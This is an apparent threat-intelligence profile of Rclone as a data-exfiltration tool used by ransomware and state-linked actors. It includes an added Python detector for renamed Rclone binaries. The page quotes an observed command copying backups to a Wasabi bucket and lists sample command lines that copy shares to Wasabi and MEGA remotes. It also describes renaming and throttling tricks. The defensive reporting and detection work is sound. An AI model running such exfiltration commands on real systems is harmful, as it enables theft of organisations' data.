rclone
Rclone is a legitimate open-source command-line cloud synchronization and file transfer tool that is frequently abused by threat actors for data exfiltration. The provided content consistently describes its use to transfer stolen data from victim environments to external cloud storage and file-sharing services including Wasabi, MEGA/mega.nz, OneDrive, SharePoint, Dropbox, Google Drive, Amazon S3, SFTP destinations, and other cloud resources. It is repeatedly referenced as a dominant or common exfiltration utility in ransomware and post-compromise operations, including cases involving Qilin affiliates, Akira, BlackCat/ALPHV affiliates, Medusa-associated activity, Storm-1175, MuddyWater/Seedworm, Ember Bear, Indrik Spider, RansomHub, Hunters International, and broader ransomware tradecraft.
Observed behaviors in the content include use of standard or renamed/hidden Rclone binaries for defense evasion, such as crowdstrike.exe and TrendFileSecurityCheck.exe; scripted execution from batch or VBS logic; transfer of large data volumes such as approximately 1 TB within 24 hours in one incident; and targeted exfiltration from internal servers, network shares, backup repositories, and cloud-connected enterprise data stores. In one Microsoft 365-focused intrusion, attackers obtained OAuth consent for an application identified as rclone and used recovered Rclone configuration data containing OneDrive and SharePoint remotes with OAuth 2.0 access and refresh tokens and scopes including Files.ReadWrite.All and Sites.Read.All. In another campaign, Operation CamelClone, attackers delivered a portable Rclone copy (v1.70.3) via spear-phishing and used it to upload desktop documents and Telegram Desktop session data to attacker-controlled MEGA accounts. The content also notes Rclone’s chunker overlay can split large files into smaller chunks during upload to bypass size limits, and that some actors throttle bandwidth during exfiltration.
The content ties Rclone to multiple intrusion contexts and sectors. It was used in ransomware and extortion incidents affecting enterprises and service providers, in attacks against healthcare, finance, education, professional services, transportation, defense, aerospace, government, diplomatic, and nonprofit targets, and in Iranian state-linked activity attributed to MuddyWater/Seedworm. Specific indicators directly mentioned include file hashes 52fda5c1b9704544f32ee98d9060e689 and 51d39aa39478beeac94f2d12f682ecce associated with a campaign where one MD5 matched an Rclone binary. Overall, the content supports high-confidence characterization of Rclone as a widely abused exfiltration utility rather than malware developed solely for malicious use.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2026-50751 is the kind of vulnerability that should make you audit your IKEv1 configurations before you finish reading this sentence... an unauthenticated remote attacker can manipulate the IKEv1 exchange in a way that causes the gateway to accept the session as authenticated without ever verifying a valid user password.
CVE-2023-22515 is a critical Broken Access Control vulnerability affecting certain versions of Atlassian Confluence Data Center and Server. Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day.
CISA, FBI, and MS-ISAC are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts.
Groups observed using it
11 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Data exfiltration via Rclone to Wasabi cloud storage: Bash: rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[BUCKET]:/192.168.0.x
Using the ‘Rclone’ tool, the threat actor exfiltrated a high volume of data from local servers to a cloud file storage service called ‘Wasabi’.
To that aim, Storm-1175 often uses Bandizip to collect files and Rclone for data exfiltration.
Data exfiltration from the on-premises environment is accomplished by using Rclone to transfer the data to the MegaSync public cloud storage service.
"Additional Resources ... Rclone"; "Exfiltration Over C2 Channel (performed by SystemBC and Rclone)"
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Stealth (1 technique)
adversaries rarely execute tools like MegaCmd or MegaSync under their original filename... you might achieve a good detection outcome by identifying processes based on metadata like their internal name and then alerting when the internal name and the presented process name do not match.
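As an added example (not from the quoted source or from the Rclone project), the following detector applies that internal-name check to constructed Sysmon-style process-creation records, using the masquerading file names this page reports. It assumes Rclone's Windows build carries `rclone.exe` as its PE OriginalFileName, which Sysmon Event ID 1 records in the `OriginalFileName` field.

```python
"""Flag renamed Rclone binaries by comparing the PE original file name
recorded in process-creation telemetry with the name the process presented.

Added example; the log records below are constructed, not taken from any report.
Field names follow Sysmon Event ID 1 (Image, OriginalFileName, CommandLine).
"""
import ntpath

# OriginalFileName that Rclone's Windows build is assumed to carry.
RCLONE_INTERNAL_NAMES = {"rclone.exe"}

# Rclone sub-commands that move data toward a remote.
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}

# Constructed Sysmon-like records. crowdstrike.exe and TrendFileSecurityCheck.exe
# are the masquerading names reported on this page; paths and remotes are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Temp\crowdstrike.exe",
     "OriginalFileName": "rclone.exe",
     "CommandLine": r"crowdstrike.exe copy D:\Shares\Finance wasabi:bucket --bwlimit 5M"},
    {"Image": r"C:\ProgramData\TrendFileSecurityCheck.exe",
     "OriginalFileName": "Rclone.exe",
     "CommandLine": r"TrendFileSecurityCheck.exe sync E:\Backups mega:exfil"},
    {"Image": r"C:\Tools\rclone\rclone.exe",
     "OriginalFileName": "rclone.exe",
     "CommandLine": "rclone.exe lsd onedrive:"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "OriginalFileName": "svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]


def classify_event(event):
    """Return a finding string for one process-creation record, or None."""
    image_name = ntpath.basename(event.get("Image", "")).lower()
    internal = event.get("OriginalFileName", "").lower()
    if internal not in RCLONE_INTERNAL_NAMES:
        return None  # not Rclone according to its own version resource
    argv = event.get("CommandLine", "").split()
    verb = argv[1].lower() if len(argv) > 1 else ""
    transfer = verb in RCLONE_TRANSFER_VERBS
    if image_name != internal:
        # Presented name disagrees with the binary's own metadata: renamed copy.
        sev = "high" if transfer else "medium"
        return f"{sev}: rclone masquerading as {image_name} (verb={verb or 'none'})"
    if transfer:
        return f"medium: rclone transfer from known binary (verb={verb})"
    return f"low: rclone executed (verb={verb or 'none'})"


def scan(events):
    """Run classify_event over a batch and return the non-empty findings."""
    return [f for f in (classify_event(e) for e in events) if f]
```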
Discovery (1 technique)
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Collection (6 techniques)
Exfiltration is performed either out of band by the affiliate using third-party tools such as Rclone, MEGA, or WinSCP
The group has been associated with callback phishing, voice phishing, fake IT support workflows, remote monitoring and management tooling, data theft, and follow-on extortion.
The malware uses the rclone utility to steal data and automatically uploads documents, photos, videos, archives and other files to the operators' servers.
The attackers commonly target document management platforms and cloud storage repositories before exfiltrating the data using tools such as WinSCP or Rclone.
Command and Control (1 technique)
Exfiltration (7 techniques)
Victims who refuse to pay face not only locked systems but also the exposure of sensitive corporate records on INC’s data leak site.
AppleSeed has divided files if the size is 0x1000000 bytes or more. APT28 has split archived exfiltration files into chunks smaller than 1MB. APT41 transfers post-exploitation files dividing the payload into fixed-size chunks to evade detection.
The Akira actors’ primary tools supporting exfiltration include WinRAR, WinSCP, rclone, and MEGA... the actors used rclone to exfiltrate information
For example, if the chosen method of transfer is over the Domain Name System (DNS) protocol, some of the tools that can be used are Pulsar or DNSExfiltrator. Additionally, another tool used for data exfiltration is Rclone.
Qilin targets enterprises across multiple sectors, leverages double-extortion (encrypt + exfiltrate)
Monitor for unexpected use of WinSCP, Rclone, cloud storage sync clients, and browser-based file transfer from sensitive systems.
The file stealers PteroVDoor and PteroPSDoor were upgraded to support exfiltration to cloud storage services (Wasabi, Tebi, and Intercolo), which became the primary exfiltration method... PteroBox continued to upload files to Dropbox, and one newer variant used the rclone utility to do so.
IOCs tracked for this family
36 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
53 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An open-source command-line file transfer utility used by attackers for data exfiltration to cloud or remote storage destinations.
Command-line file synchronization and exfiltration tool used here for data theft to cloud storage.
Rclone was used to access Microsoft 365 resources via OAuth tokens and exfiltrate SharePoint and OneDrive data using API-based access.
A file-synchronization utility used by attackers to stage and exfiltrate business-relevant data from internal network locations to external cloud storage.